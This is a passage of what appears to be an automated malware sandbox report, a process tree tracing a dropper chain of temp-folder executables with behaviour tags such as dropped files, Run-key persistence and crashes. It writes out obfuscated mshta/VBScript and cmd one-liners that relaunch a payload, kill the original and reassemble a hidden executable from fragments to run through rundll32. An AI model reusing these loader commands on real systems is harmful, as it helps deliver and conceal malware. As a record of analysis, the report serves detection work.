C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 2368⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 3488⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 5968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 6008⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 6408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 6408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 7808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "sfx_123_206.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "13⤵
-
C:\Windows\SysWOW64\control.execontrol ..\kZ_AmsXL.6G13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G14⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G15⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G16⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-2E4FB.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-2E4FB.tmp\setup_2.tmp" /SL5="$202C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-AAQA9.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-AAQA9.tmp\setup_2.tmp" /SL5="$20292,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-CILS0.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-CILS0.tmp\postback.exe" ss111⤵
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri105268dda3.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri105268dda3.exeFri105268dda3.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 2446⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10fcc13ae0125c8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10fcc13ae0125c8.exeFri10fcc13ae0125c8.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-93ORI.tmp\Fri10fcc13ae0125c8.tmp"C:\Users\Admin\AppData\Local\Temp\is-93ORI.tmp\Fri10fcc13ae0125c8.tmp" /SL5="$201EC,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10fcc13ae0125c8.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-QDBG5.tmp\Sayma.exe"C:\Users\Admin\AppData\Local\Temp\is-QDBG5.tmp\Sayma.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Reference Assemblies\SLLGYPWQFN\ultramediaburner.exe"C:\Program Files\Reference Assemblies\SLLGYPWQFN\ultramediaburner.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2OAFF.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-2OAFF.tmp\ultramediaburner.tmp" /SL5="$402D8,281924,62464,C:\Program Files\Reference Assemblies\SLLGYPWQFN\ultramediaburner.exe" /VERYSILENT9⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\33-b881b-f8f-a9e91-8b05b7a454807\Redysasory.exe"C:\Users\Admin\AppData\Local\Temp\33-b881b-f8f-a9e91-8b05b7a454807\Redysasory.exe"8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5640 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5640 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4868 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5440 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:110⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3972 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6288 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5860 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3136 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6044 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6304 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
